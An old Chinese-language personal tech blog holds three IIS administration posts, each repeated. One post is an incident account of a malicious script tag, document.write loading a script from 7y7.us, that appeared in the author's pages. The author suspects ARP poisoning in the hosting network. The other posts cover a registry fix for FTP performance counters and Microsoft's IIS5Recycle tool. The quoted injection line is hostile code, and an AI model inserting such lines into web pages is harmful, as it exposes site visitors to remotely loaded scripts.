Thank you for reading...
2007/04/23 22:02
下班回家,打开自己的统计,发现页面上头多了点东西。查看一下源代码,头部多了一句:
document.write('<script src=http://7y7.us/1.js></script>');
上服务器,查看一下,并无此内容的文件。。。
再看一下服务器上的其它站点,几乎是所有的页面全部被加上了:(包括htm和asp页面,但.shtm和.txt没有。
在搜索引擎中搜索一下,以为是这个问题。
所有网站页面头部出现 <script src=http://7y7.us/2.js></script> 代码,但是实际网页源代码里是没有的
该问题为电信机房网络中的一台服务器中了ARP病毒导致整个网络出现这种状况,电信机房已经予以封锁改服务器。今天终于恢复正常了!
但是咨询了服务提供商,并为发现同网段其它服务器有此问题,得先从自身机子找原因。
再搜索,发现前段时间cnzz和ITSUN也中过此类的毒。
看来是IIS内核程序被改?
先查看应用程序映射,正常。asp的映射程序asp.dll也正常,最后修改日期:2006-4-11 13:34,与我本机的一模一样,排除更改程序映射的怀疑。
卸载IIS,再重装,由于服务器上没有I386目录的文件,碰到一个本机上传一个。。。搞了很久恢复后,发现还是有代码:(
再检查,还是没发现。
0:30,不玩了,睡觉。
8:40,访问网站,恶意代码自己没了。。。再次怀疑真的是机房问题了!
document.write('<script src=http://7y7.us/1.js></script>');
上服务器,查看一下,并无此内容的文件。。。
再看一下服务器上的其它站点,几乎是所有的页面全部被加上了:(包括htm和asp页面,但.shtm和.txt没有。
在搜索引擎中搜索一下,以为是这个问题。
引用
所有网站页面头部出现 <script src=http://7y7.us/2.js></script> 代码,但是实际网页源代码里是没有的
该问题为电信机房网络中的一台服务器中了ARP病毒导致整个网络出现这种状况,电信机房已经予以封锁改服务器。今天终于恢复正常了!
但是咨询了服务提供商,并为发现同网段其它服务器有此问题,得先从自身机子找原因。
再搜索,发现前段时间cnzz和ITSUN也中过此类的毒。
看来是IIS内核程序被改?
先查看应用程序映射,正常。asp的映射程序asp.dll也正常,最后修改日期:2006-4-11 13:34,与我本机的一模一样,排除更改程序映射的怀疑。
卸载IIS,再重装,由于服务器上没有I386目录的文件,碰到一个本机上传一个。。。搞了很久恢复后,发现还是有代码:(
再检查,还是没发现。
0:30,不玩了,睡觉。
8:40,访问网站,恶意代码自己没了。。。再次怀疑真的是机房问题了!
2006/12/18 09:10
来源:FTPCtrs,事件ID:1000,描述:
不能收集到 FTP 性能统计资料。 服务返回的错误码是数据 DWORD 0。
若要获取关于此消息的更多的信息,请访问 Microsoft 联机支持站点:
http://www.microsoft.com/contentredirect.asp 。
系统是win2000,有使用IIS,搜索了一下,解决方法如下:
在注册表中关闭FTP性能统计,打开注册表,在HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MSFTPSVC\Performance\下添加REG_DWORD值(双字节值): Disable Performance Counters,设置值为 1 。
重启,问题解决:)
不能收集到 FTP 性能统计资料。 服务返回的错误码是数据 DWORD 0。
若要获取关于此消息的更多的信息,请访问 Microsoft 联机支持站点:
http://www.microsoft.com/contentredirect.asp 。
系统是win2000,有使用IIS,搜索了一下,解决方法如下:
在注册表中关闭FTP性能统计,打开注册表,在HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MSFTPSVC\Performance\下添加REG_DWORD值(双字节值): Disable Performance Counters,设置值为 1 。
重启,问题解决:)
2006/05/22 10:37
IIS5.0进程回收工具:该工具可以根据多项参数定时,定量重启IIS, 回收IIS进程, 大大减少应内存过少而引起的系统错误。可以定时设置,如设置IIS在每天夜里三点自动重启一次,或每个星期六重启一次等等。此外,可以设置在IIS请求数达到多少的时候自动回收,内存限额回收等等。
下载地址:http://down.itlearner.com/soft/2313.shtml
使用方法:
安装后作为系统服务运行,监控IIS的运行
iis5recycle /install 安装为系统服务
iis5recycle /config 配置IIS5RECYCLE
net start iis5recycle 启动服务
iis5recycle /uninstall 卸载服务
Overview
The IIS 5.0 Process Recycling Tool (IIS5Recycle), version 1.0, runs as a service on a computer running Windows 2000 and Internet Information Server 5.0. The purpose of IIS5Recycle is to recycle processes, minimizing the effects of resource-consumption problems before performance and reliability are affected.
官方说明文档(英文):http://www.microsoft.com/technet/prodtechnol/windows2000serv/technologies/iis/downloads/iis5rweb.mspx
配置详解:
第一行设置自动回收IIS进程的时间(即每隔多少时间回收一次,默认是168小时)
第二行设置在收到多少请求后自动回收IIS进程(默认是200000次)
第三行设置指定具体时间回收IIS进程(可按日、周设置)
第四行设置IIS使用超过多少内存后自动回收进程(我的默认是1000000)
第五行设置ASP队列超过多少后自动回收进程,可以避免ASP死锁导致的IIS挂起(默认是2000次)
IIS进程回收的日志都可以在系统自带的日志里查看到。我设置的是第三行的每天早晨2点自动回收一次,2点时访问人数一般来说比较少,比较不会影响网站的访问。可惜这个软件是针对整个IIS的,不能对单个站点进行操作。
作者:itlearner,也就是偶9enjoy,发表于2006-5-22
首发:http://www.itlearner.com/article/2006/3169.shtml
下载地址:http://down.itlearner.com/soft/2313.shtml
使用方法:
安装后作为系统服务运行,监控IIS的运行
iis5recycle /install 安装为系统服务
iis5recycle /config 配置IIS5RECYCLE
net start iis5recycle 启动服务
iis5recycle /uninstall 卸载服务
Overview
The IIS 5.0 Process Recycling Tool (IIS5Recycle), version 1.0, runs as a service on a computer running Windows 2000 and Internet Information Server 5.0. The purpose of IIS5Recycle is to recycle processes, minimizing the effects of resource-consumption problems before performance and reliability are affected.
官方说明文档(英文):http://www.microsoft.com/technet/prodtechnol/windows2000serv/technologies/iis/downloads/iis5rweb.mspx
配置详解:
第一行设置自动回收IIS进程的时间(即每隔多少时间回收一次,默认是168小时)
第二行设置在收到多少请求后自动回收IIS进程(默认是200000次)
第三行设置指定具体时间回收IIS进程(可按日、周设置)
第四行设置IIS使用超过多少内存后自动回收进程(我的默认是1000000)
第五行设置ASP队列超过多少后自动回收进程,可以避免ASP死锁导致的IIS挂起(默认是2000次)
IIS进程回收的日志都可以在系统自带的日志里查看到。我设置的是第三行的每天早晨2点自动回收一次,2点时访问人数一般来说比较少,比较不会影响网站的访问。可惜这个软件是针对整个IIS的,不能对单个站点进行操作。
作者:itlearner,也就是偶9enjoy,发表于2006-5-22
首发:http://www.itlearner.com/article/2006/3169.shtml
